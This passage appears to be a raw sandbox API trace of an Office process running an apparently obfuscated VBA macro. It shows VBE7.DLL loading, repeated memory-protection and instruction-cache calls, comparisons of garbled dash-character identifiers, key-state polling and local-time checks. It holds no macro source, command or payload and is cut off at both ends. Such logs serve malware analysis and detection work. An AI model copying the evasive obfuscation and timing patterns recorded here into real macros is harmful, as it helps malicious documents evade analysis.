GetCurrentProcess () returned 0xffffffff [0122.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0122.312] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.312] GetCurrentProcess () returned 0xffffffff [0122.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0122.312] GetCurrentProcess () returned 0xffffffff [0122.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0122.312] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.313] GetCurrentProcess () returned 0xffffffff [0122.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0122.314] GetCurrentProcess () returned 0xffffffff [0122.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0122.314] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.315] GetCurrentProcess () returned 0xffffffff [0122.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0122.315] GetCurrentProcess () returned 0xffffffff [0122.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0122.315] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0122.316] GetCurrentProcess () returned 0xffffffff [0122.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0122.316] SetErrorMode (uMode=0x8001) returned 0x8001 [0122.316] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0122.316] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0122.317] SetErrorMode (uMode=0x8001) returned 0x8001 [0122.317] GetProcAddress (hModule=0x695d0000, lpProcName=0x256) returned 0x695d74be [0122.319] GetAsyncKeyState (vKey=3) returned 0 [0122.319] CRetailMalloc_Alloc () returned 0xcb21810 [0122.319] memcpy (in: _Dst=0xb754f48, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.319] memcpy (in: _Dst=0xb755050, _Src=0x1977e4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0122.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302faa, cbMultiByte=6, lpWideCharStr=0x1975e4, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0122.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c085a, cbMultiByte=6, lpWideCharStr=0x197644, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0122.320] memcpy (in: _Dst=0xb754f48, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.321] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 3 [0122.321] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0122.321] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0122.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302fce, cbMultiByte=14, lpWideCharStr=0x1975e4, cchWideChar=15 | out: lpWideCharStr="––—––—–—––——–") returned 14 [0122.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c082e, cbMultiByte=14, lpWideCharStr=0x197644, cchWideChar=15 | out: lpWideCharStr="––—––—–—––——–") returned 14 [0122.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c082e, cbMultiByte=14, lpWideCharStr=0x197644, cchWideChar=15 | out: lpWideCharStr="––—––—–—––——–") returned 14 [0122.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c082e, cbMultiByte=14, lpWideCharStr=0x197644, cchWideChar=15 | out: lpWideCharStr="––—––—–—––——–") returned 14 [0122.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 3 [0122.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0122.322] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x96\x97\x96\x97\x96\x96\x97\x97\x96", cchCount2=-1) returned 1 [0122.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c082e, cbMultiByte=14, lpWideCharStr=0x197644, cchWideChar=15 | out: lpWideCharStr="––—––—–—––——–") returned 14 [0122.322] CRetailMalloc_Alloc () returned 0xc83e180 [0122.322] _mbscpy_s (in: _Dst=0xc83e180, _DstSizeInBytes=0xe, _Src=0x112c082e | out: _Dst=0xc83e180) returned 0x0 [0122.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0dd2, cbMultiByte=21, lpWideCharStr=0x197654, cchWideChar=22 | out: lpWideCharStr="_B_var_––—––—–—––——–") returned 21 [0122.323] _mbscpy_s (in: _Dst=0x1976bc, _DstSizeInBytes=0xe, _Src=0x112c082e | out: _Dst=0x1976bc) returned 0x0 [0122.323] CRetailMalloc_Free () returned 0x1 [0122.323] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x197634, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x197634, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x197634, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.323] memcpy (in: _Dst=0xb754f48, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0122.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0122.324] memcpy (in: _Dst=0xcb21884, _Src=0x197864, _Size=0x18 | out: _Dst=0xcb21884) returned 0xcb21884 [0122.324] CRetailMalloc_Realloc () returned 0xcb21810 [0122.324] CRetailMalloc_Free () returned 0x1 [0122.324] GetCurrentProcess () returned 0xffffffff [0122.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0122.324] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.325] GetCurrentProcess () returned 0xffffffff [0122.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0122.325] GetCurrentProcess () returned 0xffffffff [0122.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0122.325] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.326] GetCurrentProcess () returned 0xffffffff [0122.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0122.326] GetCurrentProcess () returned 0xffffffff [0122.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0122.326] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.326] GetCurrentProcess () returned 0xffffffff [0122.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0122.326] GetCurrentProcess () returned 0xffffffff [0122.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0122.326] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.327] GetCurrentProcess () returned 0xffffffff [0122.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0122.327] GetCurrentProcess () returned 0xffffffff [0122.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0122.327] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.328] GetCurrentProcess () returned 0xffffffff [0122.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0122.328] GetCurrentProcess () returned 0xffffffff [0122.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0122.328] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.329] GetCurrentProcess () returned 0xffffffff [0122.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0122.329] GetCurrentProcess () returned 0xffffffff [0122.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0122.329] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.329] GetCurrentProcess () returned 0xffffffff [0122.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0122.329] GetCurrentProcess () returned 0xffffffff [0122.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0122.330] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.330] GetCurrentProcess () returned 0xffffffff [0122.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0122.330] GetCurrentProcess () returned 0xffffffff [0122.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0122.330] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.332] GetCurrentProcess () returned 0xffffffff [0122.332] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0122.332] GetCurrentProcess () returned 0xffffffff [0122.332] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0122.332] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.333] GetCurrentProcess () returned 0xffffffff [0122.333] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0122.333] GetCurrentProcess () returned 0xffffffff [0122.333] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0122.333] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.334] GetCurrentProcess () returned 0xffffffff [0122.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0122.334] GetCurrentProcess () returned 0xffffffff [0122.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0122.334] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.334] GetCurrentProcess () returned 0xffffffff [0122.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0122.334] GetCurrentProcess () returned 0xffffffff [0122.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0122.334] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.335] GetCurrentProcess () returned 0xffffffff [0122.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0122.335] GetCurrentProcess () returned 0xffffffff [0122.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0122.335] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.336] GetCurrentProcess () returned 0xffffffff [0122.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0122.336] GetCurrentProcess () returned 0xffffffff [0122.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0122.336] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.337] GetCurrentProcess () returned 0xffffffff [0122.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0122.337] GetCurrentProcess () returned 0xffffffff [0122.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0122.337] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.337] GetCurrentProcess () returned 0xffffffff [0122.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0122.337] GetCurrentProcess () returned 0xffffffff [0122.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0122.338] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.338] GetCurrentProcess () returned 0xffffffff [0122.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0122.339] GetCurrentProcess () returned 0xffffffff [0122.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0122.339] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.340] GetCurrentProcess () returned 0xffffffff [0122.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0122.340] GetCurrentProcess () returned 0xffffffff [0122.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0122.340] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.340] GetCurrentProcess () returned 0xffffffff [0122.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0122.340] GetCurrentProcess () returned 0xffffffff [0122.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0122.340] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.341] GetCurrentProcess () returned 0xffffffff [0122.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0122.341] GetCurrentProcess () returned 0xffffffff [0122.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0122.341] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.342] GetCurrentProcess () returned 0xffffffff [0122.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0122.342] GetCurrentProcess () returned 0xffffffff [0122.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0122.342] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.342] GetCurrentProcess () returned 0xffffffff [0122.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0122.342] GetCurrentProcess () returned 0xffffffff [0122.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0122.342] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.343] GetCurrentProcess () returned 0xffffffff [0122.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0122.343] GetCurrentProcess () returned 0xffffffff [0122.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0122.343] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.344] GetCurrentProcess () returned 0xffffffff [0122.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0122.344] GetCurrentProcess () returned 0xffffffff [0122.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0122.344] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.344] GetCurrentProcess () returned 0xffffffff [0122.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0122.344] GetCurrentProcess () returned 0xffffffff [0122.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0122.344] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.345] GetCurrentProcess () returned 0xffffffff [0122.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0122.345] GetCurrentProcess () returned 0xffffffff [0122.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0122.345] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.346] GetCurrentProcess () returned 0xffffffff [0122.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0122.346] GetCurrentProcess () returned 0xffffffff [0122.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0122.346] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.388] GetCurrentProcess () returned 0xffffffff [0122.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0122.388] GetCurrentProcess () returned 0xffffffff [0122.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0122.389] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.390] GetCurrentProcess () returned 0xffffffff [0122.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0122.390] GetCurrentProcess () returned 0xffffffff [0122.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0122.390] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.391] GetCurrentProcess () returned 0xffffffff [0122.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0122.391] GetCurrentProcess () returned 0xffffffff [0122.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0122.391] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0122.392] GetCurrentProcess () returned 0xffffffff [0122.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0122.392] SetErrorMode (uMode=0x8001) returned 0x8001 [0122.392] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0122.392] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0122.393] SetErrorMode (uMode=0x8001) returned 0x8001 [0122.393] GetProcAddress (hModule=0x695d0000, lpProcName=0x217) returned 0x695d741e [0122.396] GetAsyncKeyState (vKey=3) returned 0 [0122.396] GetAsyncKeyState (vKey=3) returned 0 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0122.397] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x3, wSecond=0x3b, wMilliseconds=0x28c)) [0122.397] VarAdd (in: pvarLeft=0x197ef0, pvarRight=0x197ee0, pvarResult=0x197ed0 | out: pvarResult=0x197ed0) returned 0x0 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.397] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0122.398] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0122.398] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x3, wSecond=0x3b, wMilliseconds=0x28c)) [0124.826] GetModuleHandleW (lpModuleName=0x0) returned 0xc40000 [0124.826] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0124.826] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.827] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0124.827] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.828] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0124.828] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0124.829] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.829] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0124.830] GetProcessHeap () returned 0x440000 [0124.830] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.831] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0124.832] GetLastError () returned 0x3f0 [0124.833] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0124.833] 